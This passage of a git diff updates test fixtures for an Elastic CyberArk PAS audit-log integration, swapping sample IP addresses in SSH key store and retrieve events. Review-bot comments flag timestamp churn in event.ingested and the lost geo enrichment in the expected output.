\u003cExtraDetails\u003eaddress=rhel7.cybr.com;username=firecall1;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify SSH Key\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"firecall1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"rhel7.cybr.com\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty 
Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"SequenceID\\\" Value=\\\"2\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ExtraPass3Name\\\" Value=\\\"Operating System-UnixSSH-rhel7.cybr.com-root\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ExtraPass3Folder\\\" Value=\\\"Root\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ExtraPass3Safe\\\" Value=\\\"Linux Root\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1616666646\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1582315464\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Tags\\\" Value=\\\"SSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Privcloud\\\" Value=\\\"privcloud\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 25 06:04:06\",\"IsoTimestamp\":\"2021-03-25T10:04:06Z\",\"Hostname\":\"VLT01\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"12.0.0000\",\"MessageID\":\"414\",\"Desc\":\"CPM Verify SSH Key\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify SSH Key\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Linux SSH Keys\",\"File\":\"Root\\\\Operating 
System-UnixSSHKeys-rhel7.cybr.com-firecall1\",\"Station\":\"10.0.0.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"VerificationPeriod\",\"ExtraDetails\":\"address=rhel7.cybr.com;username=firecall1;\",\"Message\":\"CPM Verify SSH Key\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"firecall1\"},{\"Name\":\"Address\",\"Value\":\"rhel7.cybr.com\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"SequenceID\",\"Value\":\"2\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"ExtraPass3Name\",\"Value\":\"Operating System-UnixSSH-rhel7.cybr.com-root\"},{\"Name\":\"ExtraPass3Folder\",\"Value\":\"Root\"},{\"Name\":\"ExtraPass3Safe\",\"Value\":\"Linux Root\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1616666646\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1582315464\"},{\"Name\":\"Tags\",\"Value\":\"SSH\"},{\"Name\":\"Privcloud\",\"Value\":\"privcloud\"}]}}}}", "code": "414", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-427-store-ssh-key.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-427-store-ssh-key.log index 8c7361274f6..e8abd4c0395 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-427-store-ssh-key.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-427-store-ssh-key.log 
@@ -1 +1 @@ -<5>1 2021-03-11T16:50:17Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:50:17\n 2021-03-11T16:50:17Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 427\n Store SSH Key\n Info\n Administrator\n Store SSH Key\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 127.0.0.1\n \n \n \n \n \n Store SSH Key\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:50:17","IsoTimestamp":"2021-03-11T16:50:17Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"427","Desc":"Store SSH Key","Severity":"Info","Issuer":"Administrator","Action":"Store SSH Key","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store SSH Key","GatewayStation":"10.0.1.20"}}} +<5>1 2021-03-11T16:50:17Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:50:17\n 2021-03-11T16:50:17Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 427\n Store SSH Key\n Info\n Administrator\n Store SSH Key\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 127.0.0.1\n \n \n \n \n \n Store SSH Key\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:50:17","IsoTimestamp":"2021-03-11T16:50:17Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"427","Desc":"Store SSH Key","Severity":"Info","Issuer":"Administrator","Action":"Store SSH Key","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store SSH Key","GatewayStation":"10.0.1.20"}}} 
diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-427-store-ssh-key.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-427-store-ssh-key.log-expected.json
index 165ca01a18a..57f90fa6c94 100644
--- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-427-store-ssh-key.log-expected.json
+++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-427-store-ssh-key.log-expected.json
@@ -28,7 +28,7 @@
 },
 "@timestamp": "2021-03-11T16:50:17.000Z",
 "file": {
- "path": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian"
+ "path": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian"
 },
 "ecs": {
 "version": "1.12.0"
@@ -44,11 +44,11 @@ "severity": "Info", "iso_timestamp": "2021-03-11T16:50:17Z", "gateway_station": "10.0.1.20", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 08:50:17\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T16:50:17Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e427\u003c/MessageID\u003e\n \u003cDesc\u003eStore SSH Key\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eStore SSH Key\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eStore SSH Key\u003c/Message\u003e\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 08:50:17\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T16:50:17Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e427\u003c/MessageID\u003e\n \u003cDesc\u003eStore SSH 
Key\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eStore SSH Key\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eStore SSH Key\u003c/Message\u003e\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "Store SSH Key", "issuer": "Administrator", "rfc5424": true, - "file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian", + "file": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian", "safe": "PSM", "station": "127.0.0.1", "action": "Store SSH Key", 
@@ -62,8 +62,8 @@ "event": { "severity": 2, "action": "store ssh key", - "ingested": "2021-06-09T10:24:35.310803700Z", - "original": "\u003c5\u003e1 2021-03-11T16:50:17Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:50:17\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:50:17Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e427\u003c/MessageID\u003e\\n \u003cDesc\u003eStore SSH Key\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eStore SSH Key\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eStore SSH Key\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:50:17\",\"IsoTimestamp\":\"2021-03-11T16:50:17Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"427\",\"Desc\":\"Store SSH Key\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Store SSH 
Key\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store SSH Key\",\"GatewayStation\":\"10.0.1.20\"}}}", + "ingested": "2021-12-09T13:37:04.617241200Z", + "original": "\u003c5\u003e1 2021-03-11T16:50:17Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:50:17\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:50:17Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e427\u003c/MessageID\u003e\\n \u003cDesc\u003eStore SSH Key\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eStore SSH Key\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eStore SSH Key\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 
08:50:17\",\"IsoTimestamp\":\"2021-03-11T16:50:17Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"427\",\"Desc\":\"Store SSH Key\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Store SSH Key\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store SSH Key\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "427", "kind": "event" } diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-428-retrieve-ssh-key.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-428-retrieve-ssh-key.log index 1420d0a428e..b51cf1be1ff 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-428-retrieve-ssh-key.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-428-retrieve-ssh-key.log 
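Review bot: The `event.ingested` value in this hunk changes only because the fixture was regenerated at a different time, not because of the IP replacement, so it will churn on every regeneration and bury the real diff; the `@@ -99,8 +90,8 @@` hunk of test-428-retrieve-ssh-key.log-expected.json carries the same change. Unless the package's pipeline test config already does so, declaring the field dynamic in the test's `-config.yml` (if the package has one), `dynamic_fields:` followed by `  event.ingested: ".*"`, lets elastic-package ignore it when comparing expected output. The `"event"` object this hunk edits continues outside the hunk.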
@@ -1,3 +1,3 @@ -<5>1 2021-03-11T17:43:44Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:43:44\n 2021-03-11T17:43:44Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 428\n Retrieve SSH Key\n Info\n Administrator\n Retrieve SSH Key\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 127.0.0.1\n \n \n \n (Action: Retrieve SSH key)for fun and profit\n \n \n for fun and profit\n Retrieve SSH key\n \n\n \n Retrieve SSH Key\n 10.0.1.20\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:43:44","IsoTimestamp":"2021-03-11T17:43:44Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"428","Desc":"Retrieve SSH Key","Severity":"Info","Issuer":"Administrator","Action":"Retrieve SSH Key","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"(Action: Retrieve SSH key)for fun and profit","PvwaDetails":{"RetrieveReason":{"General":{"UserReason":"for fun and profit","RetrieveAction":"Retrieve SSH key"}}},"ExtraDetails":"","Message":"Retrieve SSH Key","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T21:08:48Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 13:08:48\n 2021-03-11T21:08:48Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 428\n Retrieve SSH Key\n Info\n Administrator\n Retrieve SSH Key\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 127.0.0.1\n \n \n \n (Action: Connect)testing(Connection to address: 34.123.103.115)\n \n \n testing\n Connect\n \n \n 34.123.103.115\n \n\n \n Retrieve SSH Key\n 10.0.1.20\n \n \n \n \n \n \n \n 
\n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 13:08:48","IsoTimestamp":"2021-03-11T21:08:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"428","Desc":"Retrieve SSH Key","Severity":"Info","Issuer":"Administrator","Action":"Retrieve SSH Key","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"(Action: Connect)testing(Connection to address: 34.123.103.115)","PvwaDetails":{"RetrieveReason":{"General":{"UserReason":"testing","RetrieveAction":"Connect"},"ConnectionDetails":{"ConnectionAddress":"34.123.103.115"}}},"ExtraDetails":"","Message":"Retrieve SSH Key","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T13:18:52Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:18:52\n 2021-03-15T13:18:52Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 428\n Retrieve SSH Key\n Info\n Administrator\n Retrieve SSH Key\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 127.0.0.1\n \n \n \n (Action: Retrieve SSH key)\n \n \n Retrieve SSH key\n \n\n \n Retrieve SSH Key\n 10.0.1.20\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:18:52","IsoTimestamp":"2021-03-15T13:18:52Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"428","Desc":"Retrieve SSH Key","Severity":"Info","Issuer":"Administrator","Action":"Retrieve SSH Key","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"(Action: 
Retrieve SSH key)","PvwaDetails":{"RetrieveReason":{"General":{"RetrieveAction":"Retrieve SSH key"}}},"ExtraDetails":"","Message":"Retrieve SSH Key","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T17:43:44Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:43:44\n 2021-03-11T17:43:44Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 428\n Retrieve SSH Key\n Info\n Administrator\n Retrieve SSH Key\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 127.0.0.1\n \n \n \n (Action: Retrieve SSH key)for fun and profit\n \n \n for fun and profit\n Retrieve SSH key\n \n\n \n Retrieve SSH Key\n 10.0.1.20\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:43:44","IsoTimestamp":"2021-03-11T17:43:44Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"428","Desc":"Retrieve SSH Key","Severity":"Info","Issuer":"Administrator","Action":"Retrieve SSH Key","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"(Action: Retrieve SSH key)for fun and profit","PvwaDetails":{"RetrieveReason":{"General":{"UserReason":"for fun and profit","RetrieveAction":"Retrieve SSH key"}}},"ExtraDetails":"","Message":"Retrieve SSH Key","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T21:08:48Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 13:08:48\n 
2021-03-11T21:08:48Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 428\n Retrieve SSH Key\n Info\n Administrator\n Retrieve SSH Key\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 127.0.0.1\n \n \n \n (Action: Connect)testing(Connection to address: 67.43.156.15)\n \n \n testing\n Connect\n \n \n 67.43.156.15\n \n\n \n Retrieve SSH Key\n 10.0.1.20\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 13:08:48","IsoTimestamp":"2021-03-11T21:08:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"428","Desc":"Retrieve SSH Key","Severity":"Info","Issuer":"Administrator","Action":"Retrieve SSH Key","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"(Action: Connect)testing(Connection to address: 67.43.156.15)","PvwaDetails":{"RetrieveReason":{"General":{"UserReason":"testing","RetrieveAction":"Connect"},"ConnectionDetails":{"ConnectionAddress":"67.43.156.15"}}},"ExtraDetails":"","Message":"Retrieve SSH Key","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T13:18:52Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:18:52\n 2021-03-15T13:18:52Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 428\n Retrieve SSH Key\n Info\n Administrator\n Retrieve SSH Key\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 127.0.0.1\n \n \n \n (Action: Retrieve SSH key)\n \n \n Retrieve SSH key\n \n\n \n Retrieve SSH Key\n 10.0.1.20\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 
06:18:52","IsoTimestamp":"2021-03-15T13:18:52Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"428","Desc":"Retrieve SSH Key","Severity":"Info","Issuer":"Administrator","Action":"Retrieve SSH Key","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"(Action: Retrieve SSH key)","PvwaDetails":{"RetrieveReason":{"General":{"RetrieveAction":"Retrieve SSH key"}}},"ExtraDetails":"","Message":"Retrieve SSH Key","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-428-retrieve-ssh-key.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-428-retrieve-ssh-key.log-expected.json
index a5514b806f2..3a02548c116 100644
--- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-428-retrieve-ssh-key.log-expected.json
+++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-428-retrieve-ssh-key.log-expected.json
@@ -7,20 +7,11 @@
 }
 },
 "destination": {
- "geo": {
- "continent_name": "North America",
- "country_name": "United States",
- "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
- },
- "address": "34.123.103.115",
 "user": {
 "name": "adrian"
 },
- "ip": "34.123.103.115"
+ "address": "67.43.156.15",
+ "ip": "67.43.156.15"
 },
 "source": {
 "user": {
@@ -43,7 +34,7 @@
 },
 "@timestamp": "2021-03-11T17:43:44.000Z",
 "file": {
- "path": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian"
+ "path": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian"
 },
 "ecs": {
 "version": "1.12.0"
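Review bot: The new expected output in the `@@ -7,20 +7,11 @@` hunk drops `destination.geo` entirely rather than replacing it with the enrichment for `67.43.156.15`, and the `@@ -124,20 +115,11 @@` hunk does the same for the second event. The removed lines show the pipeline was geo-enriching `destination.ip`, so unless that processor was changed as well, an address picked from the supported test subset should presumably still yield a `geo` object; the absence looks more like the file was regenerated without the test GeoIP database available than like a deliberate change. Worth confirming, and if so regenerating with `elastic-package test pipeline --generate` with the test database in place, because as written this fixture no longer asserts the geo enrichment at all. The document containing this `"destination"` object continues outside the hunk.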
@@ -55,7 +46,7 @@
 ],
 "ip": [
 "127.0.0.1",
- "34.123.103.115",
+ "67.43.156.15",
 "10.0.1.20"
 ]
 },
